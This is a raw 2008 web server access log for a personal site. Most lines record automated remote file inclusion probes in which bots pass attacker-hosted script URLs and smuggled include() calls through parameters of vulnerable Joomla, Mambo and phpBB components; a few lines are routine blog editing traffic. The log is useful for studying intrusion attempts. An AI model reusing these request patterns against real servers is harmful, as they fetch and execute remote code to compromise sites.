72.199.235.196 - - [12/Aug/2008:11:05:54 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:06:10 -0700] "GET /logs//error.php?error=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:06:10 -0700] "GET //error.php?error=http://www.community.nigeria.com//forums/Packages/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:11:06:20 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 200 18517 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:11:06:20 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/metaljaya/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:06:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:06:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:06:26 -0700] "GET /logs/access_080321.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [12/Aug/2008:11:06:26 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.61.106.55 - - [12/Aug/2008:11:06:31 -0700] "GET /logs/booth.php?include_path=http://ashlandpress.com//backup/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
69.61.106.55 - - [12/Aug/2008:11:06:32 -0700] "GET /booth.php?include_path=http://ashlandpress.com//backup/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:06:55 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:07:01 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:07:06 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:07:08 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:07:13 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:07:46 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:07:55 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:07:57 -0700] "GET /logs/access_080313.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:07:57 -0700] "GET /logs/access_080313.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:11:08:13 -0700] "GET / HTTP/1.0" 200 18209 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:08:15 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:08:15 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:08:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.24 - - [12/Aug/2008:11:08:15 -0700] "GET /logs/access_080321.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.210.62.135 - - [12/Aug/2008:11:08:38 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:08:55 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
190.54.62.66 - - [12/Aug/2008:11:09:05 -0700] "GET //modules/xt_conteudo//admin/spaw/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:09:11 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:09:11 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:09:12 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:09:12 -0700] "GET /logs/access_080404.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:09:13 -0700] "GET /logs/access_080404.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:09:14 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thegoodfoot.com/logs/lase.jpg??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:09:18 -0700] "GET /logs/access_080218.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:09:18 -0700] "GET /logs/access_080218.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:09:26 -0700] "GET /logs/access_080226.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:09:26 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:09:26 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
59.106.19.213 - - [12/Aug/2008:11:09:26 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:09:34 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:09:34 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:09:34 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:09:43 -0700] "GET /logs/access_080329.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:09:46 -0700] "GET /logs/access_080131.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:09:46 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:09:46 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:09:55 -0700] "GET /logs/access_080114.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:09:56 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:09:59 -0700] "GET /logs/access_071218.log/!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:09:59 -0700] "GET /!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:10:00 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:10:05 -0700] "GET /logs/access_071216.log/!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:10:05 -0700] "GET /logs/access_071225.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:10:07 -0700] "GET /logs/access_071218.log/!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:10:07 -0700] "GET /!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:10:08 -0700] "GET /logs/!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:10:10 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:10:10 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:10:11 -0700] "GET /logs/access_071216.log/!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:10:13 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18555 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:10:13 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18555 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:10:14 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:10:14 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.70.4 - - [12/Aug/2008:11:10:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bdf-diff.net/img/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
75.127.70.4 - - [12/Aug/2008:11:10:40 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bdf-diff.net/img/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
70.86.236.106 - - [12/Aug/2008:11:10:47 -0700] "GET /!scanhttp://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:10:55 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:00 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:00 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:11:01 -0700] "GET /logs/access_080315.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:11:02 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:11:03 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:03 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:03 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:04 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:04 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:11:23 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18557 "-" "libwww-perl/5.76" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:11:25 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:11:26 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:11:26 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:11:11:30 -0700] "GET /logs/access_080121.log//components/com_minibb.php?absolute_path=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:11:11:35 -0700] "GET //components/com_minibb.php?absolute_path=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:11:36 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:11:36 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:11:37 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.104.82 - - [12/Aug/2008:11:11:37 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:39 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:11:41 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:11:11:44 -0700] "GET /logs/access_080121.log//components/com_minibb.php?absolute_path=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:11:11:49 -0700] "GET //components/com_minibb.php?absolute_path=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.187.101.14 - - [12/Aug/2008:11:11:54 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:11:54 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:11:56 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:12:00 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:12:04 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18545 "-" "libwww-perl/5.76" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:12:10 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:12:10 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:11:12:10 -0700] "GET /logs/access_080124.log/errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:12:11 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:12:12 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:12:16 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:12:17 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:12:18 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:12:19 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:12:34 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:12:34 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:12:56 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:13:13 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
